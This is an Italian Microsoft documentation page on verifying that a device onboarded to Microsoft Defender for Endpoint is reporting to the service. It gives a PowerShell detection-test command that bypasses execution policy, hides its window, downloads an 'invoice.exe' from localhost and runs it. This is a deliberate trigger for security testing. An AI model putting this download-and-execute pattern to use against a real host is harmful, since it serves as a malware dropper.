Eseguire un test di rilevamento in un dispositivo di cui è stato eseguito di recente l'onboarding in Microsoft Defender per endpoint

  • Articolo

Si applica a:

Se si desidera provare Microsoft Defender per endpoint, iscriversi a una versione di valutazione gratuita.

Quando si aggiunge un dispositivo al servizio Microsoft Defender per endpoint per la gestione, viene definito onboarding. L'onboarding consente ai dispositivi di segnalare segnali sullo stato di integrità al servizio.

Verificare che un dispositivo venga aggiunto correttamente al servizio è un passaggio critico nell'intero processo di distribuzione. Consente di garantire che tutti i dispositivi previsti siano gestiti.

Verificare Microsoft Defender per endpoint onboarding di un dispositivo usando un test di rilevamento di PowerShell

Eseguire lo script di PowerShell seguente in un dispositivo appena caricato per verificare che venga segnalato correttamente al servizio Defender per endpoint.

  1. Nel dispositivo aprire prompt dei comandi come amministratore.

  2. Al prompt copiare ed eseguire il comando seguente:

    powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'

La finestra del prompt dei comandi viene chiusa automaticamente. In caso di esito positivo, nel portale viene visualizzato un nuovo avviso per il dispositivo di cui è stato eseguito l'onboarding in circa 10 minuti.

Nota

È anche possibile usare la stringa di test EICAR per eseguire questo test. Create un file di testo, incollare la riga EICAR e salvare il file come file eseguibile nell'unità locale dell'endpoint. Si riceveranno una notifica dell'endpoint di test e un avviso nel portale di Microsoft Defender.

Consiglio

Per saperne di più, Engage con la community Microsoft Security nella community tech: Microsoft Defender per endpoint Tech Community.